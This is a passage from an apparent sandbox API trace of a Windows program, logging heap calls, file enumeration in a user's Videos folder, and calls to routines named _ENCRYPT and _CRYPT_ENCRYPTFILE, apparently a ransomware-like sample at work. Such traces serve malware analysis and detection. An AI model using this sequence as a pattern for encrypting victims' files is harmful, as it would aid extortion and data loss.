Flags=0x0, Size=0x10) returned 0x88cc40 [0041.843] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5b8 [0041.843] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cce8 [0041.843] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0041.843] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889628 [0041.843] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5b8 [0041.843] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c928 [0041.843] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0041.844] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c898 [0041.844] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5b8 [0041.844] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af7c8 [0041.844] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0041.844] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0041.844] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5b8 [0041.844] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb08 [0041.844] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0041.844] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd30 [0041.844] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af7c8 [0041.844] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af468 [0041.844] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889c10 [0041.844] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd30 | out: hHeap=0x770000) returned 1 [0041.844] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0041.844] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889c10 | out: hHeap=0x770000) returned 1 [0041.844] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0041.844] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1378 [0041.844] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af468 [0041.844] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889c10 [0041.844] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af7c8 [0041.844] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0041.844] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd30 [0041.844] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889c10 | out: hHeap=0x770000) returned 1 [0041.844] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0041.844] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd30 | out: hHeap=0x770000) returned 1 [0041.844] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0041.844] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0041.844] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd30 [0041.844] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0041.845] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0041.845] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x889c10 [0041.845] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x889c10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0041.845] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889c10 | out: hHeap=0x770000) returned 1 [0041.845] GetProcAddress (hModule=0x76e10000, lpProcName="CloseHandle") returned 0x76e21410 [0041.845] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd30 | out: hHeap=0x770000) returned 1 [0041.845] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0041.845] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0ce8 [0041.845] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0041.845] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0041.845] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0ce8 | out: hHeap=0x770000) returned 1 [0041.845] CloseHandle (hObject=0x128) returned 1 [0041.845] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0041.845] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b87d0 [0041.845] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af7c8 [0041.845] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd30 [0041.845] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889c10 [0041.845] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889220 [0041.845] FreeLibrary (hLibModule=0x76e10000) returned 1 [0041.845] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0041.845] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1378 | out: hHeap=0x770000) returned 1 [0041.846] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb08 | out: hHeap=0x770000) returned 1 [0041.846] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0041.846] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ceb0 | out: hHeap=0x770000) returned 1 [0041.846] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889b08 | out: hHeap=0x770000) returned 1 [0041.846] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c730 | out: hHeap=0x770000) returned 1 [0041.846] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd78 | out: hHeap=0x770000) returned 1 [0041.846] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cce8 | out: hHeap=0x770000) returned 1 [0041.846] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc40 | out: hHeap=0x770000) returned 1 [0041.846] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c928 | out: hHeap=0x770000) returned 1 [0041.846] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889628 | out: hHeap=0x770000) returned 1 [0041.846] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c898 | out: hHeap=0x770000) returned 1 [0041.846] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1328 | out: hHeap=0x770000) returned 1 [0041.846] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd30 | out: hHeap=0x770000) returned 1 [0041.846] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889c10 | out: hHeap=0x770000) returned 1 [0041.846] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0041.846] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b87d0 | out: hHeap=0x770000) returned 1 [0041.846] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0041.846] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0041.846] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0041.846] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889c10 | out: hHeap=0x770000) returned 1 [0041.846] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889928 | out: hHeap=0x770000) returned 1 [0041.846] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0041.846] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0041.846] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0041.846] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0041.847] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0041.847] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0041.847] PeekMessageW (in: lpMsg=0x6aea94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea94) returned 0 [0041.847] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="i", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0041.847] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ni", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0041.847] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ini", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0041.847] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".ini", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0041.847] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0041.847] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0041.847] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0041.847] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\desktop.ini", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x1f8, dwReserved0=0x0, dwReserved1=0x777648, cFileName="desktop.ini", cAlternateFileName="")) returned 0x7c20c0 [0041.847] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0041.847] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0041.847] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\desktop.ini", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x1f8, dwReserved0=0x0, dwReserved1=0x777648, cFileName="desktop.ini", cAlternateFileName="")) returned 0x7c20c0 [0041.847] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0041.847] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0041.847] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0041.848] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0041.848] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0041.848] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0041.848] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0041.848] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0041.848] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0041.848] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0041.848] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0041.848] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\lIYPp18.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\liypp18.mp4"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0041.848] FreeLibrary (hLibModule=0x76e10000) returned 1 [0041.848] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0041.848] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0041.848] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0041.848] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0041.849] FreeLibrary (hLibModule=0x76e10000) returned 1 [0041.849] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0041.849] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0041.849] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0041.849] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0041.849] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0041.849] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0041.849] PeekMessageW (in: lpMsg=0x6aea94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea94) returned 0 [0041.849] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="4", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0041.849] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p4", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0041.849] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mp4", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0041.849] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".mp4", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0041.849] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0041.849] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0041.849] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0041.849] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\lIYPp18.mp4", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4aff59b0, ftCreationTime.dwHighDateTime=0x1d5bb64, ftLastAccessTime.dwLowDateTime=0xc55df7e0, ftLastAccessTime.dwHighDateTime=0x1d5c4cc, ftLastWriteTime.dwLowDateTime=0xc55df7e0, ftLastWriteTime.dwHighDateTime=0x1d5c4cc, nFileSizeHigh=0x0, nFileSizeLow=0x13c5f, dwReserved0=0x0, dwReserved1=0x777648, cFileName="lIYPp18.mp4", cAlternateFileName="")) returned 0x7c20c0 [0041.849] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0041.849] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0041.849] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\lIYPp18.mp4", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4aff59b0, ftCreationTime.dwHighDateTime=0x1d5bb64, ftLastAccessTime.dwLowDateTime=0xc55df7e0, ftLastAccessTime.dwHighDateTime=0x1d5c4cc, ftLastWriteTime.dwLowDateTime=0xc55df7e0, ftLastWriteTime.dwHighDateTime=0x1d5c4cc, nFileSizeHigh=0x0, nFileSizeLow=0x13c5f, dwReserved0=0x0, dwReserved1=0x777648, cFileName="lIYPp18.mp4", cAlternateFileName="")) returned 0x7c20c0 [0041.850] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0041.850] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0041.850] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\lIYPp18.mp4\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0041.850] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\lIYPp18.mp4\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0041.850] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=":\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\lIYPp18.mp4\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0041.850] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\lIYPp18.mp4\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0041.850] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Users\\5p5NrGJn0jS HALPmcxz\\Videos\\lIYPp18.mp4\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0041.850] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sers\\5p5NrGJn0jS HALPmcxz\\Videos\\lIYPp18.mp4\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0041.850] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ers\\5p5NrGJn0jS HALPmcxz\\Videos\\lIYPp18.mp4\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0041.850] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rs\\5p5NrGJn0jS HALPmcxz\\Videos\\lIYPp18.mp4\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0041.850] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\5p5NrGJn0jS HALPmcxz\\Videos\\lIYPp18.mp4\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0041.850] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\5p5NrGJn0jS HALPmcxz\\Videos\\lIYPp18.mp4\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0041.850] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5p5NrGJn0jS HALPmcxz\\Videos\\lIYPp18.mp4\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0041.850] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p5NrGJn0jS HALPmcxz\\Videos\\lIYPp18.mp4\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0041.850] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5NrGJn0jS HALPmcxz\\Videos\\lIYPp18.mp4\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0041.850] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NrGJn0jS HALPmcxz\\Videos\\lIYPp18.mp4\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0041.850] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rGJn0jS HALPmcxz\\Videos\\lIYPp18.mp4\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0041.850] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GJn0jS HALPmcxz\\Videos\\lIYPp18.mp4\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0041.850] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Jn0jS HALPmcxz\\Videos\\lIYPp18.mp4\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0041.850] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n0jS HALPmcxz\\Videos\\lIYPp18.mp4\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0041.850] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0jS HALPmcxz\\Videos\\lIYPp18.mp4\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0041.850] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jS HALPmcxz\\Videos\\lIYPp18.mp4\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0041.850] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S HALPmcxz\\Videos\\lIYPp18.mp4\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0041.850] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" HALPmcxz\\Videos\\lIYPp18.mp4\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0041.850] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HALPmcxz\\Videos\\lIYPp18.mp4\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0041.850] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ALPmcxz\\Videos\\lIYPp18.mp4\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0041.850] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LPmcxz\\Videos\\lIYPp18.mp4\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0041.850] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pmcxz\\Videos\\lIYPp18.mp4\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0041.850] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mcxz\\Videos\\lIYPp18.mp4\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0041.851] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cxz\\Videos\\lIYPp18.mp4\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0041.851] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xz\\Videos\\lIYPp18.mp4\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0041.851] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z\\Videos\\lIYPp18.mp4\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0041.851] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Videos\\lIYPp18.mp4\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0041.851] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Videos\\lIYPp18.mp4\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0041.851] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ideos\\lIYPp18.mp4\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0041.851] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="deos\\lIYPp18.mp4\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0041.851] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="eos\\lIYPp18.mp4\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0041.851] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="os\\lIYPp18.mp4\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0041.851] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\lIYPp18.mp4\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0041.851] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\lIYPp18.mp4\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0041.851] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="lIYPp18.mp4\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0041.851] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="IYPp18.mp4\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0041.851] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="YPp18.mp4\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0041.851] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pp18.mp4\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0041.851] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0041.851] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0041.851] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0041.851] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, 